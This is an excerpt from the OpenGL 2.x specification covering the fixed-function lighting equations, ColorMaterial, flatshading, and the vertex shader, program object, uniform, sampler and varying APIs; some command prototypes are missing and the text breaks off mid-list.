GL lighting computes colors for each vertex sent to the GL. This is accomplished by applying an equation defined by a client-specified lighting model to a collection of parameters that can include the vertex coordinates, the coordinates of one or more light sources, the current normal, and parameters defining the characteristics of the light sources and a current material. The following discussion assumes that the GL is in RGBA mode. (Color index lighting is described in section 2.14.5.)

Lighting is turned on or off using the generic Enable or Disable commands with the symbolic value LIGHTING. If lighting is off, the current color and current secondary color are assigned to the vertex primary and secondary color, respectively. If lighting is on, colors computed from the current lighting parameters are assigned to the vertex primary and secondary colors.

[Table 2.10: Summary of lighting parameters. The range of individual color components is (−∞, +∞).] In the lighting equations, the operation d1 ⊙ d2 denotes max{d1 · d2, 0}.

Let V be the point corresponding to the vertex being lit, and n be the corresponding normal. Let P_e be the eyepoint ((0, 0, 0, 1) in eye coordinates).

Lighting produces two colors at a vertex: a primary color c_pri and a secondary color c_sec.
The values of c_pri and c_sec depend on the light model color control, c_es. If c_es = SINGLE_COLOR, then the equations to compute c_pri and c_sec are

    c_pri = e_cm
          + a_cm * a_cs
          + sum_{i=0}^{n-1} (att_i)(spot_i) [ a_cm * a_cli
                                            + (n ⊙ VP̂_pli) d_cm * d_cli
                                            + (f_i)(n ⊙ ĥ_i)^(s_rm) s_cm * s_cli ]

    c_sec = (0, 0, 0, 1)

If c_es = SEPARATE_SPECULAR_COLOR, then

    c_pri = e_cm
          + a_cm * a_cs
          + sum_{i=0}^{n-1} (att_i)(spot_i) [ a_cm * a_cli
                                            + (n ⊙ VP̂_pli) d_cm * d_cli ]

    c_sec = sum_{i=0}^{n-1} (att_i)(spot_i)(f_i)(n ⊙ ĥ_i)^(s_rm) s_cm * s_cli

where

    f_i = 1,   n ⊙ VP̂_pli ≠ 0,                                          (2.2)
          0,   otherwise;

    h_i = VP̂_pli + VP̂_e,          v_bs = TRUE,                          (2.3)
          VP̂_pli + ( 0 0 1 )^T,    v_bs = FALSE;

    att_i = 1 / (k0_i + k1_i ||VP_pli|| + k2_i ||VP_pli||^2),
                   if P_pli's w ≠ 0,                                     (2.4)
            1.0,   otherwise;

    spot_i = (P̂_pliV ⊙ ŝ_dli)^(s_rli),  c_rli ≠ 180.0, P̂_pliV ⊙ ŝ_dli ≥ cos(c_rli),
             0.0,                        c_rli ≠ 180.0, P̂_pliV ⊙ ŝ_dli < cos(c_rli),  (2.5)
             1.0,                        c_rli = 180.0.

All computations are carried out in eye coordinates.

The value of A produced by lighting is the alpha value associated with d_cm. A is always associated with the primary color c_pri; the alpha component of c_sec is always 1. Results of lighting are undefined if the w_e coordinate (w in eye coordinates) of V is zero.

Lighting may operate in two-sided mode (t_bs = TRUE), in which a front color is computed with one set of material parameters (the front material) and a back color is computed with a second set of material parameters (the back material). This second computation replaces n with −n. If t_bs = FALSE, then the back color and front color are both assigned the color computed using the front material with n.

Additionally, vertex shaders can operate in two-sided color mode. When a vertex shader is active, front and back colors can be computed by the vertex shader and written to the gl_FrontColor, gl_BackColor, gl_FrontSecondaryColor and gl_BackSecondaryColor outputs. If VERTEX_PROGRAM_TWO_SIDE is enabled, the GL chooses between front and back colors, as described below. Otherwise, the front color output is always selected.
Two-sided color mode is enabled and disabled by calling Enable or Disable with the symbolic value VERTEX_PROGRAM_TWO_SIDE.

The selection between back and front colors depends on the primitive of which the vertex being lit is a part. If the primitive is a point or a line segment, the front color is always selected. If it is a polygon, then the selection is based on the sign of the (clipped or unclipped) polygon's signed area computed in window coordinates. One way to compute this area is

    a = (1/2) sum_{i=0}^{n-1} ( x_w^i y_w^(i⊕1) − x_w^(i⊕1) y_w^i )     (2.6)

where x_w^i and y_w^i are the x and y window coordinates of the i-th vertex of the n-vertex polygon (vertices are numbered starting at zero for purposes of this computation) and i ⊕ 1 is (i + 1) mod n. The interpretation of the sign of this value is controlled with

    void FrontFace( enum dir );

Setting dir to CCW (corresponding to counter-clockwise orientation of the projected polygon in window coordinates) indicates that if a ≤ 0, then the color of each vertex of the polygon becomes the back color computed for that vertex, while if a > 0, then the front color is selected. If dir is CW, then a is replaced by −a in the above inequalities. This requires one bit of state; initially, it indicates CCW.

A direction ( d_x  d_y  d_z )^T is transformed to

    ( d'_x  d'_y  d'_z )^T = M_u ( d_x  d_y  d_z )^T

where M_u is the upper left 3 × 3 matrix taken from the current model-view matrix M.

An individual light is enabled or disabled by calling Enable or Disable with the symbolic value LIGHTi (i is in the range 0 to n − 1, where n is the implementation-dependent number of lights). If light i is disabled, the i-th term in the lighting equation is effectively removed from the summation.

2.14.3 ColorMaterial

It is possible to attach one or more material properties to the current color, so that they continuously track its component values. This behavior is enabled and disabled by calling Enable or Disable with the symbolic value COLOR_MATERIAL.
The command that controls which of these modes is selected is

    void ColorMaterial( enum face, enum mode );

face is one of FRONT, BACK, or FRONT_AND_BACK, indicating whether the front material, back material, or both are affected by the current color. mode is one of EMISSION, AMBIENT, DIFFUSE, SPECULAR, or AMBIENT_AND_DIFFUSE and specifies which material property or properties track the current color. If mode is EMISSION, AMBIENT, DIFFUSE, or SPECULAR, then the value of e_cm, a_cm, d_cm or s_cm, respectively, will track the current color. If mode is AMBIENT_AND_DIFFUSE, both a_cm and d_cm track the current color. The replacements made to material properties are permanent; the replaced values remain until changed by either sending a new color or by setting a new material value when ColorMaterial is not currently enabled to override that particular value. When COLOR_MATERIAL is enabled, the indicated parameter or parameters always track the current color. For instance, calling

    ColorMaterial(FRONT, AMBIENT)

while COLOR_MATERIAL is enabled sets the front material a_cm to the value of the current color.

[Figure: ColorMaterial operation. The current color flows to the front ambient, diffuse, specular, and emission material parameters, and from there to the lighting equations, only while COLOR_MATERIAL is enabled with the corresponding mode.]

Material properties can be changed inside a Begin/End pair indirectly by enabling ColorMaterial mode and making Color calls. However, when a vertex shader is active such property changes are not guaranteed to update material parameters, defined in table 2.11, until the following End command.

where att_i and spot_i are given by equations 2.4 and 2.5, respectively, and f_i and ĥ_i are given by equations 2.2 and 2.3, respectively. Let s' = min{s, 1}. Finally, let

    d = sum_{i=0}^{n-1} (att_i)(spot_i)(d_li)(n ⊙ VP̂_pli).
2.14.7 Flatshading

A primitive may be flatshaded, meaning that all vertices of the primitive are assigned the same color index or the same primary and secondary colors. These colors are the colors of the vertex that spawned the primitive. For a point, these are the colors associated with the point. For a line segment, they are the colors of the second (final) vertex of the segment. For a polygon, they come from a selected vertex depending on how the polygon was generated. Table 2.12 summarizes the possibilities.

[Table 2.12: Polygon flatshading color selection. The colors used for flatshading the i-th polygon generated by the indicated Begin/End type are derived from the current color (if lighting is disabled) in effect when the indicated vertex is specified. If lighting is enabled, the colors are produced by lighting the indicated vertex. Vertices are numbered 1 through n, where n is the number of vertices between the Begin/End pair.]

Flatshading is controlled by

    void ShadeModel( enum mode );

The mode value must be either of the symbolic constants SMOOTH or FLAT. If mode is SMOOTH (the initial state), vertex colors are treated individually. If mode is FLAT, flatshading is turned on. ShadeModel thus requires one bit of state.

Using the value t produced by clipping (section 2.12), the color at a clipped vertex is

    c = t c_1 + (1 − t) c_2.

(For a color index color, multiplying a color by a scalar means multiplying the index by the scalar. For an RGBA color, it means multiplying each of R, G, B, and A by the scalar. Both primary and secondary colors are treated in the same fashion.)

Polygon clipping may create a clipped vertex along an edge of the clip volume's boundary. This situation is handled by noting that polygon clipping proceeds by clipping against one plane of the clip volume's boundary at a time. Color clipping is done in the same way, so that clipped points always occur at the intersection of polygon edges (possibly already clipped) with the clip volume's boundary.
Texture and fog coordinates, vertex shader varying variables (section 2.15.3), and point sizes computed on a per-vertex basis must also be clipped when a primitive is clipped. The method is exactly analogous to that used for color clipping.

Shader objects are attached to a program object. A program object is then linked, which generates executable code from all the compiled shader objects attached to the program. When a linked program object is used as the current program object, the executable code for the vertex shaders it contains is used to process vertices.

In addition to vertex shaders, fragment shaders can be created, compiled, and linked into program objects. Fragment shaders affect the processing of fragments during rasterization, and are described in section 3.11. A single program object can contain both vertex and fragment shaders.

When the program object currently in use includes a vertex shader, its vertex shader is considered active and is used to process vertices. If the program object has no vertex shader, or no program object is currently in use, the fixed-function method for processing vertices is used instead.

A shader object is created with the command

    uint CreateShader( enum type );

The shader object is empty when it is created. The type argument specifies the type of shader object to be created. For vertex shaders, type must be VERTEX_SHADER. A non-zero name that can be used to reference the shader object is returned. If an error occurs, zero will be returned.

The command

    void ShaderSource( uint shader, sizei count, const char **string, const int *length );

loads source code into the shader object named shader. string is an array of count pointers to optionally null-terminated character strings that make up the source code. The length argument is an array with the number of chars in each string (the string length).

A shader object is compiled with the command

    void CompileShader( uint shader );

Each shader object has a boolean status, COMPILE_STATUS, that is modified as a result of compilation. This status can be queried with GetShaderiv (see section 6.1.14). This status will be set to TRUE if shader was compiled without errors and is ready for use, and FALSE otherwise.
Compilation can fail for a variety of reasons as listed in the OpenGL Shading Language Specification. If CompileShader failed, any information about a previous compile is lost. Thus a failed compile does not restore the old state of shader.

Changing the source code of a shader object with ShaderSource does not change its compile status or the compiled shader code.

Each shader object has an information log, which is a text string that is overwritten as a result of compilation. This information log can be queried with GetShaderInfoLog to obtain more information about the compilation attempt (see section 6.1.14).

Shader objects can be deleted with the command

    void DeleteShader( uint shader );

The executable code that runs on one of the programmable stages is called an executable. All information necessary for defining an executable is encapsulated in a program object. A program object is created with the command

    uint CreateProgram( void );

Program objects are empty when they are created. A non-zero name that can be used to reference the program object is returned. If an error occurs, 0 will be returned.

To attach a shader object to a program object, use the command

    void AttachShader( uint program, uint shader );

In order to use the shader objects contained in a program object, the program object must be linked. The command

    void LinkProgram( uint program );

will link the program object named program. Each program object has a boolean status, LINK_STATUS, that is modified as a result of linking. This status can be queried with GetProgramiv (see section 6.1.14). This status will be set to TRUE if a valid executable is created, and FALSE otherwise. Linking can fail for a variety of reasons as specified in the OpenGL Shading Language Specification. Linking will also fail if one or more of the shader objects attached to program are not compiled successfully, or if more active uniform or active sampler variables are used in program than allowed (see section 2.15.3). If LinkProgram failed, any information about a previous link of that program object is lost. Thus, a failed link does not restore the old state of program.

Uniforms are per-program variables that are constant during program execution. Samplers are a special form of uniform used for texturing (section 3.8).
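Putting the commands above together, a hedged C sketch of the create/compile/attach/link sequence using the gl-prefixed bindings. This assumes a current OpenGL 2.0 context with these entry points resolved; src is a placeholder for GLSL vertex shader source, and error handling is reduced to the status queries the text describes:

```c
#include <GL/gl.h>
#include <stdio.h>

/* Build a program object containing one vertex shader.  Returns the
 * program name, or 0 on compile/link failure (mirroring the spec's
 * COMPILE_STATUS and LINK_STATUS queries). */
GLuint build_program(const char *src) {
    GLuint shader = glCreateShader(GL_VERTEX_SHADER);
    glShaderSource(shader, 1, &src, NULL);   /* NULL length: null-terminated */
    glCompileShader(shader);

    GLint ok;
    glGetShaderiv(shader, GL_COMPILE_STATUS, &ok);
    if (!ok) {
        char log[1024];
        glGetShaderInfoLog(shader, sizeof log, NULL, log);
        fprintf(stderr, "compile failed: %s\n", log);
        return 0;
    }

    GLuint program = glCreateProgram();
    glAttachShader(program, shader);
    glLinkProgram(program);
    glGetProgramiv(program, GL_LINK_STATUS, &ok);
    return ok ? program : 0;
}
```

Because a failed compile or link discards the previous state of the object, applications typically check both statuses before calling UseProgram.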
Varying variables hold the results of vertex shader execution that are used later in the pipeline. The following sections describe each of these variable types.

Vertex Attributes

Vertex shaders can access built-in vertex attribute variables corresponding to the per-vertex state set by commands such as Vertex, Normal, and Color. Vertex shaders can also define named attribute variables, which are bound to the generic vertex attributes that are set by VertexAttrib*. This binding can be specified by the application before the program is linked, or automatically assigned by the GL when the program is linked.

When an attribute variable declared as a float, vec2, vec3 or vec4 is bound to a generic attribute index i, its value(s) are taken from the x, (x, y), (x, y, z), or (x, y, z, w) components, respectively, of the generic attribute i. When an attribute variable is declared as a mat2, mat3x2 or mat4x2, its matrix columns are taken from the (x, y) components of generic attributes i and i + 1 (mat2), from attributes i through i + 2 (mat3x2), or from attributes i through i + 3 (mat4x2). When an attribute variable is declared as a mat2x3, mat3 or mat4x3, its matrix columns are taken from the (x, y, z) components of generic attributes i and i + 1 (mat2x3), from attributes i through i + 2 (mat3), or from attributes i through i + 3 (mat4x3). When an attribute variable is declared as a mat2x4, mat3x4 or mat4, its matrix columns are taken from the (x, y, z, w) components of generic attributes i and i + 1 (mat2x4), from attributes i through i + 2 (mat3x4), or from attributes i through i + 3 (mat4).

An attribute variable (either conventional or generic) is considered active if it is determined by the compiler and linker that the attribute may be accessed when the shader is executed. Attribute variables that are declared in a vertex shader but never used will not count against the limit. In cases where the compiler and linker cannot make a conclusive determination, an attribute will be considered active.
A program object will fail to link if the sum of the active generic and active conventional attributes exceeds MAX_VERTEX_ATTRIBS.

To determine the set of active vertex attributes used by a program, and to determine their types, use the command

    void GetActiveAttrib( uint program, uint index, sizei bufSize, sizei *length, int *size, enum *type, char *name );

This command provides information about the attribute selected by index. An index of 0 selects the first active attribute, and an index of ACTIVE_ATTRIBUTES − 1 selects the last active attribute. The value of ACTIVE_ATTRIBUTES can be queried with GetProgramiv (see section 6.1.14). If index is greater than or equal to ACTIVE_ATTRIBUTES, the error INVALID_VALUE is generated. Note that index simply identifies a member in a list of active attributes, and has no relation to the generic attribute that the corresponding variable is bound to.

The parameter program is the name of a program object for which the command LinkProgram has been issued in the past. It is not necessary for program to have been linked successfully. The link could have failed because the number of active attributes exceeded the limit.

The name of the selected attribute is returned as a null-terminated string in name. The actual number of characters written into name, excluding the null terminator, is returned in length. If length is NULL, no length is returned. The maximum number of characters that may be written into name, including the null terminator, is specified by bufSize. The returned attribute name can be the name of a generic attribute or a conventional attribute (conventional attribute names begin with the prefix "gl_"; see the OpenGL Shading Language Specification for a complete list). The length of the longest attribute name in program is given by ACTIVE_ATTRIBUTE_MAX_LENGTH, which can be queried with GetProgramiv (see section 6.1.14).

For the selected attribute, the type of the attribute is returned into type. The size of the attribute is returned into size. The value in size is in units of the type returned in type.
The type returned can be any of FLOAT, FLOAT_VEC2, FLOAT_VEC3, FLOAT_VEC4, FLOAT_MAT2, FLOAT_MAT3, FLOAT_MAT4, FLOAT_MAT2x3, FLOAT_MAT2x4, FLOAT_MAT3x2, FLOAT_MAT3x4, FLOAT_MAT4x2, or FLOAT_MAT4x3.

If an error occurred, the return parameters length, size, type and name will be unmodified.

This command will return as much information about active attributes as possible. If no information is available, length will be set to zero and name will be an empty string. This situation could arise if GetActiveAttrib is issued after a failed link.

After a program object has been linked successfully, the bindings of attribute variable names to indices can be queried. The command

    int GetAttribLocation( uint program, const char *name );

returns the generic attribute index that the attribute variable named name was bound to when the program object named program was last linked. name must be a null-terminated string. If name is active and is an attribute matrix, GetAttribLocation returns the index of the first column of that matrix. If program has not been successfully linked, the error INVALID_OPERATION is generated. If name is not an active attribute, if name is a conventional attribute, or if an error occurs, −1 will be returned.

The binding of an attribute variable to a generic attribute index can also be specified explicitly. The command

    void BindAttribLocation( uint program, uint index, const char *name );

specifies that the attribute variable named name in program program should be bound to generic vertex attribute index when the program is next linked. If name was bound previously, its assigned binding is replaced with index. name must be a null-terminated string. The error INVALID_VALUE is generated if index is equal to or greater than MAX_VERTEX_ATTRIBS. BindAttribLocation has no effect until the program is linked. In particular, it does not modify the bindings of active attribute variables in a program that has already been linked.
Built-in attribute variables are automatically bound to conventional attributes, and cannot have an assigned binding. The error INVALID_OPERATION is generated if name starts with the reserved "gl_" prefix.

When a program is linked, any active attributes without a binding specified through BindAttribLocation will automatically be bound to vertex attributes by the GL. Such bindings can be queried using the command GetAttribLocation. LinkProgram will fail if the assigned binding of an active attribute variable would cause the GL to reference a non-existent generic attribute (one greater than or equal to MAX_VERTEX_ATTRIBS). LinkProgram will fail if the attribute bindings assigned by BindAttribLocation do not leave enough space to assign a location for an active matrix attribute, which requires multiple contiguous generic attributes. LinkProgram will also fail if the vertex shaders used in the program object contain assignments (not removed during pre-processing) to both an attribute variable bound to generic attribute zero and the conventional vertex position (gl_Vertex).

BindAttribLocation may be issued before any vertex shader objects are attached to a program object. Hence it is allowed to bind any name (except a name starting with "gl_") to an index, including a name that is never used as an attribute in any vertex shader object. Assigned bindings for attribute variables that do not exist or are not active are ignored.

The values of generic attributes sent to generic attribute index i are part of current state, just like the conventional attributes. If a new program object has been made active, then these values will be tracked by the GL in such a way that the same values will be observed by attributes in the new program object that are also bound to index i.

It is possible for an application to bind more than one attribute name to the same location. This is referred to as aliasing.
Aliasing will only work if only one of the aliased attributes is active in the executable program, or if no path through the shader consumes more than one attribute of a set of attributes aliased to the same location. A link error can occur if the linker determines that every path through the shader consumes multiple aliased attributes, but implementations are not required to generate an error in this case. The compiler and linker are allowed to assume that no aliasing is done, and may employ optimizations that work only in the absence of aliasing. It is not possible to alias generic attributes with conventional ones.

Uniform Variables

Shaders can declare named uniform variables, as described in the OpenGL Shading Language Specification. Values for these uniforms are constant over a primitive, and typically they are constant across many primitives. Uniforms are program object-specific state. They retain their values once loaded, and their values are restored whenever a program object is used, as long as the program object has not been re-linked. A uniform is considered active if it is determined by the compiler and linker that the uniform will actually be accessed when the executable code is executed. In cases where the compiler and linker cannot make a conclusive determination, the uniform will be considered active.

The amount of storage available for uniform variables accessed by a vertex shader is specified by the implementation-dependent constant MAX_VERTEX_UNIFORM_COMPONENTS. This value represents the number of individual floating-point, integer, or boolean values that can be held in uniform variable storage for a vertex shader. A link error will be generated if an attempt is made to utilize more than the space available for vertex shader uniform variables.

When a program is successfully linked, all active uniforms belonging to the program object are initialized to zero (FALSE for booleans). A successful link will also generate a location for each active uniform.
The values of active uniforms can be changed using this location and the appropriate Uniform* command (see below). These locations are invalidated and new ones assigned after each successful re-link.

To find the location of an active uniform variable within a program object, use the command

This command will return the location of uniform variable name. name must be a null-terminated string, without white space. The value -1 will be returned if name does not correspond to an active uniform variable name in program or if name starts with the reserved prefix "gl_". If program has not been successfully linked, the error INVALID_OPERATION is generated. After a program is linked, the location of a uniform variable will not change, unless the program is re-linked.

A valid name cannot be a structure, an array of structures, or any portion of a single vector or a matrix. In order to identify a valid name, the "." (dot) and "[]" operators can be used in name to specify a member of a structure or element of an array.

The first element of a uniform array is identified using the name of the uniform array appended with "[0]". If the last part of the string name indicates a uniform array, then the location of the first element of that array can be retrieved either by using the name of the uniform array, or by using the name of the uniform array appended with "[0]".

To determine the set of active uniform variables used by a program, and to determine their sizes and types, use the command:

This command provides information about the uniform selected by index. An index of 0 selects the first active uniform, and an index of ACTIVE_UNIFORMS − 1 selects the last active uniform. The value of ACTIVE_UNIFORMS can be queried with GetProgramiv (see section 6.1.14). If index is greater than or equal to ACTIVE_UNIFORMS, the error INVALID_VALUE is generated.
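The name-resolution rules above (exact matching, the reserved "gl_" prefix, and the "arr"/"arr[0]" equivalence for the first element of a uniform array) can be sketched as follows. The lookup table and function name are illustrative only; a real GL generates the locations itself at link time.

```python
# Hedged sketch of the uniform-name lookup rules above. `locations`
# stands in for the link-generated table; array uniforms are keyed by
# their canonical first-element name, e.g. "lights[0]".
def get_uniform_location(locations, name):
    if name.startswith("gl_"):
        return -1  # reserved prefix never resolves
    if name in locations:
        return locations[name]
    # the first element of an array may be addressed without "[0]"
    if name + "[0]" in locations:
        return locations[name + "[0]"]
    return -1  # not an active uniform
```

So both "lights" and "lights[0]" resolve to the location of the array's first element, while reserved or inactive names return -1.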
Note that index simply identifies a member in a list of active uniforms, and has no relation to the location assigned to the corresponding uniform variable.

The parameter program is a name of a program object for which the command LinkProgram has been issued in the past. It is not necessary for program to have been linked successfully. The link could have failed because the number of active uniforms exceeded the limit.

If an error occurred, the return parameters length, size, type and name will be unmodified.

For the selected uniform, the uniform name is returned into name. The string name will be null terminated. The actual number of characters written into name, excluding the null terminator, is returned in length. If length is NULL, no length is returned. The maximum number of characters that may be written into name, including the null terminator, is specified by bufSize. The returned uniform name can be the name of built-in uniform state as well. The complete list of built-in uniform state is described in section 7.5 of the OpenGL Shading Language Specification.

The Uniform*i{v} commands will load count sets of one to four integer values into a uniform location defined as a sampler, an integer, an integer vector, an array of samplers, an array of integers, or an array of integer vectors. Only the Uniform1i{v} commands can be used to load sampler values (see below).

The UniformMatrix{234}fv commands will load count 2 × 2, 3 × 3, or 4 × 4 matrices (corresponding to 2, 3, or 4 in the command name) of floating-point values into a uniform location defined as a matrix or an array of matrices. If transpose is FALSE, the matrix is specified in column major order, otherwise in row major order.

The UniformMatrix{2x3,3x2,2x4,4x2,3x4,4x3}fv commands will load count 2×3, 3×2, 2×4, 4×2, 3×4, or 4×3 matrices (corresponding to the numbers in the command name) of floating-point values into a uniform location defined as a matrix or an array of matrices.
The first number in the command name is the number of columns; the second is the number of rows. For example, UniformMatrix2x4fv is used to load a matrix consisting of two columns and four rows. If transpose is FALSE, the matrix is specified in column major order, otherwise in row major order.

When loading values for a uniform declared as a boolean, a boolean vector, an array of booleans, or an array of boolean vectors, both the Uniform*i{v} and Uniform*f{v} sets of commands can be used to load boolean values. Type conversion is done by the GL. The uniform is set to FALSE if the input value is 0 or 0.0f, and set to TRUE otherwise. The Uniform* command used must match the size of the uniform, as declared in the shader. For example, to load a uniform declared as a bvec2, either Uniform2i{v} or Uniform2f{v} can be used. An INVALID_OPERATION error will be generated if an attempt is made to use a non-matching Uniform* command. In this example, using Uniform1iv would generate an error.

For all other uniform types the Uniform* command used must match the size and type of the uniform, as declared in the shader. No type conversions are done. For example, to load a uniform declared as a vec4, Uniform4f{v} must be used. To load a 3x3 matrix, UniformMatrix3fv must be used. An INVALID_OPERATION error will be generated if an attempt is made to use a non-matching Uniform* command. In this example, using Uniform4i{v} would generate an error.

When loading N elements starting at an arbitrary position k in a uniform declared as an array, elements k through k + N − 1 in the array will be replaced with the new values. Values for any array element that exceeds the highest array element index used, as reported by GetActiveUniform, will be ignored by the GL.

If the value of location is -1, the Uniform* commands will silently ignore the data passed in, and the current uniform values will not be changed.
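The column-major versus row-major layout selected by the transpose parameter can be made concrete with a small packing sketch for the 2-column, 4-row case used by UniformMatrix2x4fv. The helper below is illustrative only; it simply shows how the same matrix flattens into the client array under the two orderings.

```python
# Illustrative packing for a 2-column x 4-row matrix, as consumed by
# UniformMatrix2x4fv. transpose == False means the flat array is in
# column major order; transpose == True means row major order.
def pack_matrix(columns, transpose):
    """columns: list of column vectors, e.g. two columns of four rows."""
    if not transpose:
        # column major: all of column 0, then all of column 1
        return [v for col in columns for v in col]
    rows = len(columns[0])
    # row major: walk row by row across the columns
    return [columns[c][r] for r in range(rows) for c in range(len(columns))]
```

With columns [1,2,3,4] and [5,6,7,8], column-major packing yields 1,2,3,4,5,6,7,8 and row-major packing yields 1,5,2,6,3,7,4,8.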
If any of the following conditions occur, an INVALID_OPERATION error is generated:

• if the size indicated in the name of the Uniform* command used does not match the size of the uniform declared in the shader,

• if the uniform declared in the shader is not of type boolean and the type indicated in the name of the Uniform* command used does not match the type of the uniform,

• if count is greater than one, and the uniform declared in the shader is not an array variable,

Samplers

Samplers are special uniforms used in the OpenGL Shading Language to identify the texture object used for each texture lookup. The value of a sampler indicates the texture image unit being accessed. Setting a sampler's value to i selects texture image unit number i. The values of i range from zero to the implementation-dependent maximum supported number of texture image units.

The type of the sampler identifies the target on the texture image unit. The texture object bound to that texture image unit's target is then used for the texture lookup. For example, a variable of type sampler2D selects target TEXTURE_2D on its texture image unit. Binding of texture objects to targets is done as usual with BindTexture. Selecting the texture image unit to bind to is done as usual with ActiveTexture.

The location of a sampler needs to be queried with GetUniformLocation, just like any uniform variable. Sampler values need to be set by calling Uniform1i{v}. Loading samplers with any of the other Uniform* entry points is not allowed and will result in an INVALID_OPERATION error.

It is not allowed to have variables of different sampler types pointing to the same texture image unit within a program object. This situation can only be detected at the next rendering command issued, and an INVALID_OPERATION error will then be generated.

Active samplers are samplers actually being used in a program object. The LinkProgram command determines if a sampler is active or not.
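The rule that samplers of different types must not select the same texture image unit can be sketched as a small consistency check. The data layout below is an assumption for illustration; a real GL performs this detection internally at the next rendering command.

```python
# Sketch of the consistency rule above: within one program object,
# samplers of different types must not point at the same texture image
# unit. Returns the conflicting units (empty list means no error).
def check_sampler_units(samplers):
    """samplers: {uniform name: (sampler type, texture image unit)}."""
    unit_types = {}
    conflicts = set()
    for _name, (stype, unit) in samplers.items():
        if unit in unit_types and unit_types[unit] != stype:
            conflicts.add(unit)  # two different sampler types, one unit
        unit_types.setdefault(unit, stype)
    return sorted(conflicts)
```

Two samplers of the same type on one unit are fine; a sampler2D and a samplerCube on the same unit are not.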
The LinkProgram command will attempt to determine if the active samplers in the shader(s) contained in the program object exceed the maximum allowable limits. If it determines that the count of active samplers exceeds the allowable limits, then the link fails (these limits can be different for different types of shaders). Each active sampler variable counts against the limit, even if multiple samplers refer to the same texture image unit. If this cannot be determined at link time, for example if the program object only contains a vertex shader, then it will be determined at the next rendering command issued, and an INVALID_OPERATION error will then be generated.

Varying Variables

A vertex shader may define one or more varying variables (see the OpenGL Shading Language specification). These values are expected to be interpolated across the primitive being rendered. The OpenGL Shading Language specification defines a set of built-in varying variables for vertex shaders that correspond to the values required for the fixed-function processing that occurs after vertex processing.

The number of interpolators available for processing varying variables is given by the implementation-dependent constant MAX_VARYING_FLOATS. This value represents the number of individual floating-point values that can be interpolated; varying variables declared as vectors, matrices, and arrays will all consume multiple interpolators. When a program is linked, all components of any varying variable written by a vertex shader, or read by a fragment shader, will count against this limit. The transformed vertex position (gl_Position) is not a varying variable and does not count against this limit. A program whose shaders access more than MAX_VARYING_FLOATS components worth of varying variables may fail to link, unless device-dependent optimizations are able to make the program fit within available hardware resources.

• All of the above applies when setting the current raster position (section 2.13).
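The component counting against MAX_VARYING_FLOATS can be sketched as below. The component widths follow the usual GLSL type sizes; the function name and the list-of-pairs encoding are assumptions made for illustration.

```python
# Sketch of the counting rule above: every component of a varying
# written by the vertex shader or read by the fragment shader counts
# against MAX_VARYING_FLOATS; gl_Position does not. Arrays multiply
# the per-element component count.
COMPONENTS = {"float": 1, "vec2": 2, "vec3": 3, "vec4": 4,
              "mat2": 4, "mat3": 9, "mat4": 16}

def varying_components(varyings):
    """varyings: list of (type, array size) pairs."""
    return sum(COMPONENTS[t] * n for t, n in varyings)
```

A vec4, a mat3, and a two-element float array together consume 4 + 9 + 2 = 15 components; a link may fail once the total exceeds MAX_VARYING_FLOATS.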
The following operations are applied to vertex values that are the result of executing the vertex shader:

• Color, texture coordinate, fog, point-size and generic attribute clipping (section 2.14.8).

There are several special considerations for vertex shader execution described in the following sections.

Texture Access

Vertex shaders have the ability to do a lookup into a texture map, if supported by the GL implementation. The maximum number of texture image units available to a vertex shader is MAX_VERTEX_TEXTURE_IMAGE_UNITS; a maximum number of zero indicates that the GL implementation does not support texture accesses in vertex shaders. The maximum number of texture image units available to the fragment stage of the GL is MAX_TEXTURE_IMAGE_UNITS. Both the vertex shader and fragment processing combined cannot use more than MAX_COMBINED_TEXTURE_IMAGE_UNITS texture image units. If both the vertex shader and the fragment processing stage access the same texture image unit, then that counts as using two texture image units against the MAX_COMBINED_TEXTURE_IMAGE_UNITS limit.

When a texture lookup is performed in a vertex shader, the filtered texture value τ is computed in the manner described in sections 3.8.8 and 3.8.9, and converted to a texture source color Cs according to table 3.20 (section 3.8.13). A four-component vector (Rs, Gs, Bs, As) is returned to the vertex shader.

In a vertex shader, it is not possible to perform automatic level-of-detail calculations using partial derivatives of the texture coordinates with respect to window coordinates as described in section 3.8.8. Hence, there is no automatic selection of an image array level. Minification or magnification of a texture map is controlled by a level-of-detail value optionally passed as an argument in the texture lookup functions. If the texture lookup function supplies an explicit level-of-detail value l, then the pre-bias level-of-detail value λbase(x, y) = l (replacing equation 3.18).
If the texture lookup function does not supply an explicit level-of-detail value, then λbase(x, y) = 0. The scale factor ρ(x, y) and its approximation function f(x, y) (see equation 3.21) are ignored.

Texture lookups involving textures with depth component data can either return the depth data directly or return the results of a comparison with the r texture coordinate used to perform the lookup, as described in section 3.8.14. The comparison operation is requested in the shader by using the shadow sampler types (sampler1DShadow or sampler2DShadow) and in the texture using the TEXTURE_COMPARE_MODE parameter. These requests must be consistent; the results of a texture lookup are undefined if:

• The sampler used in a texture lookup function is of type sampler1D or sampler2D, and the texture object's internal format is DEPTH_COMPONENT, and the TEXTURE_COMPARE_MODE is not NONE.

• The sampler used in a texture lookup function is of type sampler1DShadow or sampler2DShadow, and the texture object's internal format is DEPTH_COMPONENT, and the TEXTURE_COMPARE_MODE is NONE.

If a vertex shader uses a sampler where the associated texture object is not complete, as defined in section 3.8.10, the texture image unit will return (R, G, B, A) = (0, 0, 0, 1).

Position Invariance

If a vertex shader uses the built-in function ftransform to generate a vertex position, then this generally guarantees that the transformed position will be the same whether using this vertex shader or the fixed-function pipeline. This allows for correct multi-pass rendering algorithms, where some passes use fixed-function vertex transformation and other passes use a vertex shader. If a vertex shader does not use ftransform to generate a position, transformed positions are not guaranteed to match, even if the sequence of instructions used to compute the position match the sequence of transformations described in section 2.11.
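The two undefined-result conditions for depth-texture lookups earlier in this section reduce to a simple predicate: the shadow-ness of the sampler type and the TEXTURE_COMPARE_MODE setting must agree. This sketch encodes the rule with illustrative string names; it is not a GL API.

```python
# Sketch of the depth-texture consistency rule above: a lookup is
# well defined only when the shadow sampler types and the texture's
# TEXTURE_COMPARE_MODE request the same behavior.
def lookup_defined(sampler_type, internal_format, compare_mode):
    shadow = sampler_type in ("sampler1DShadow", "sampler2DShadow")
    depth = internal_format == "DEPTH_COMPONENT"
    if depth and not shadow and compare_mode != "NONE":
        return False  # non-shadow sampler but comparison enabled
    if depth and shadow and compare_mode == "NONE":
        return False  # shadow sampler but comparison disabled
    return True
```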
Validation

It is not always possible to determine at link time if a program object actually will execute. Therefore validation is done when the first rendering command is issued, to determine if the currently active program object can be executed. If it cannot be executed then no fragments will be rendered, and Begin, RasterPos, or any command that performs an implicit Begin will generate the error INVALID_OPERATION.

This error is generated by Begin, RasterPos, or any command that performs an implicit Begin if:

